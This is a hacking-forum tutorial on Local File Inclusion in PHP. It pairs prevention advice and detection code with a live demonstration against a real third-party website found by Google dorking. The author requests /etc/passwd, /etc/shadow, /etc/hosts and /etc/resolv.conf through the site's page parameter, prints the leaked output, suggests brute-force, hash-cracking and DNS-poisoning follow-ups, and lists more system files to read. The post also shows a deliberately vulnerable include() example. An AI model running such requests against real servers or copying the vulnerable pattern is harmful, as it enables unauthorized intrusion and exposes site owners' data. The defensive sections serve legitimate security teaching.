What is Local File Inclusion Vulnerability? (Practical Explanation)
Hello dear TurkHackTeam members, in this post I will talk about the Local File Inclusion vulnerability and try to explain what kind of data you can access by using this vulnerability.

LFI, or Local File Inclusion, is a web security vulnerability. Thanks to this vulnerability, we can read, change or run any file on the server. The main reason for this vulnerability is that the data is not properly filtered and validated by the site administrator, and any file is included directly (with functions such as include or require). We can explain an example LFI situation as follows;
PHP:
<?php
    // Vulnerable example: the page name is taken straight from the URL
    // and passed to include() without any check
    $page = $_GET['page'];
    include($page . '.php');
?>

 

If the page is built like this, a visitor can reach any file they want simply by manipulating the URL. When we want to go to the contact page, the URL will look like this;
Code:
http://denemesite.com/index.php?page=iletisim

 

How to Prevent LFI Vulnerability?
1. Validation of User Input
File names entered by the user must be filtered. Only allowed file names should be accessible.
To achieve this, a code like this can be written;
PHP:
// Allowlist: only these page names may ever be included
$allowed_pages = ['anasayfa', 'hakkimizda', 'iletisim'];
if (in_array($_GET['page'], $allowed_pages)) {
    include($_GET['page'] . '.php');
} else {
    echo "Bu sayfayı görmek için yetkiniz yok!";
}

2. URL Sanitization
We can block characters such as ../ or .. in the entered file names.
3. Real File Paths
Instead of including files dynamically, we can fix the file paths and ensure that only certain files are used.
4. Server Configuration
We can control the access permissions to important files by limiting access to the local file system on our server. We can also limit the file inclusion functions in PHP with open_basedir and disable_functions.
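Putting steps 1 to 3 together, here is an added example (not code from the original post) of a checked replacement for include($_GET['page'] . '.php'): an exact allowlist match, a fixed base directory, and a realpath() check that the resolved file still lies inside it. The pages/ directory name and the demo inputs are assumptions.

```php
<?php
// Added example, not code from the original post: a checked replacement for
// include($_GET['page'] . '.php') combining allowlist, sanitization and fixed
// file paths. The pages/ directory name is an assumption for the demo.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['anasayfa', 'hakkimizda', 'iletisim'];

/**
 * Map a user-supplied page name to a file under PAGES_DIR, or return null
 * if the name is not allowlisted or does not resolve inside that directory.
 */
function resolvePage(string $page): ?string
{
    // Step 1: strict allowlist match; "../", "/etc/passwd" or
    // "iletisim.php" are rejected here and never reach the file system.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Steps 2 and 3: the path is built from a fixed base, resolved with
    // realpath(), and confirmed to still lie below that base (guards against
    // symlinks or a future allowlist entry that contains a separator).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Demo: create a throwaway pages/iletisim.php so this script runs stand-alone.
@mkdir(PAGES_DIR);
file_put_contents(PAGES_DIR . '/iletisim.php', "<?php echo 'contact page';\n");

// 'hakkimizda' is allowlisted but the file does not exist, so it is rejected too.
$inputs = ['iletisim', 'hakkimizda', '/etc/passwd', '../../../etc/passwd', 'iletisim.php'];
foreach ($inputs as $input) {
    $result = resolvePage($input);
    printf("%-22s => %s\n", $input, $result === null ? 'rejected' : 'include ' . $result);
}
```

In the real handler, `$file = resolvePage((string)($_GET['page'] ?? 'anasayfa'))` replaces the raw include and a null result goes to the "yetkiniz yok" branch; open_basedir from step 4 adds the same containment at the PHP runtime level.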

So let's get to the main topic: how can we evaluate the LFI vulnerability?
First of all, we do a small dork search on Google. I searched for index.php?page= to keep it very simple, went to the first page that came up and started trying the files in order.
1. /etc/passwd
With this directory I can see the user information and perform a Bruteforce attack with this information.
URL: https://www.ravagedband.com/index.php?page=/etc/passwd
Output:
Code:
root:x:0:0:root:/root:/bin/false
ravagedband.com:x:53224:53224:ravagedband.com:/home/ravagedband.com:/bin/false

2. /etc/shadow
With this directory, I can see the hash of users' passwords and enter the system after cracking them with the help of password crackers.
URL: https://www.ravagedband.com/index.php?page=/etc/shadow
Output:


3. /etc/hosts
Through this directory I can see which IP corresponds to which DNS name, and a DNS Poisoning attack can be carried out by manipulating this file.
URL: https://www.ravagedband.com/index.php?page=/etc/hosts
Output:
Code:
127.0.0.1    localhost
::1        localhost ip6-localhost ip6-loopback
ff02::1        ip6-allnodes
ff02::2        ip6-allrouters

4. /etc/hostname
With this directory I can learn the host name of the server.
URL: https://www.ravagedband.com/index.php?page=/etc/hosts
Output:

Code:
onecom

5. /etc/resolv.conf
Through this directory I can see the DNS servers used by the system.
URL: https://www.ravagedband.com/index.php?page=/etc/resolv.conf
Output:
Code:
domain cst.webpod10-cph3.one.com
nameserver 10.41.62.5
nameserver 10.41.62.4
options rotate timeout:1

On the site we tried, we could only access this data.

Apart from these, you can see network configuration settings with /etc/network/interfaces, SSH configuration with /etc/ssh/sshd_config, the disk structure of the system with /etc/fstab, scheduled tasks with /etc/crontab, which software sources the package manager uses with /etc/apt/sources.list, and which users can use the sudo command with /etc/sudoers.
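From the defender's side, requests like the /etc/passwd and /etc/shadow ones above leave a clear trace in the web server's access log. The following is an added example (not part of the original post) that flags such probes in combined-format log lines; the log lines are constructed for the demo and the client IPs are documentation addresses.

```php
<?php
// Added example, not part of the original post: flags LFI probes like the
// /etc/passwd and /etc/shadow requests above in web-server access logs.
// The log lines are constructed; client IPs are documentation ranges.
declare(strict_types=1);

// Each pattern marks a "page" value that points outside the include directory.
const LFI_PATTERNS = [
    '#(^|[\\\\/])\.\.([\\\\/]|$)#',      // ../ or ..\ traversal (after decoding)
    '#^/(etc|proc|var|root|home)(/|$)#', // absolute path into system directories
    '#\x00#',                             // embedded null byte (%00)
    '#^(php|file|data|expect)://#i',     // stream wrappers
];

/** Return one finding string per suspicious query parameter in a combined-log line. */
function inspectLogLine(string $line): array
{
    $re = '#^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})#';
    if (!preg_match($re, $line, $m)) { return []; }
    [, $client, $target, $status] = $m;
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) { return []; }
    parse_str($query, $params);               // percent-decodes each value once
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) { continue; }
        $decoded = rawurldecode($value);       // second pass catches %252e%252e
        foreach (LFI_PATTERNS as $pattern) {
            if (preg_match($pattern, $decoded)) {
                $findings[] = "$client param=$name value=$decoded status=$status";
                break;
            }
        }
    }
    return $findings;
}

$sampleLog = <<<'LOG'
203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /index.php?page=iletisim HTTP/1.1" 200 512
203.0.113.7 - - [10/May/2024:12:00:05 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1043
203.0.113.7 - - [10/May/2024:12:00:09 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 2210
LOG;

foreach (explode("\n", $sampleLog) as $line) {
    foreach (inspectLogLine($line) as $finding) {
        echo "LFI probe: $finding\n";
    }
}
```

A 200 status on a flagged line is the important signal: it means the include actually served the file, whereas a 403 shows the allowlist did its job.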
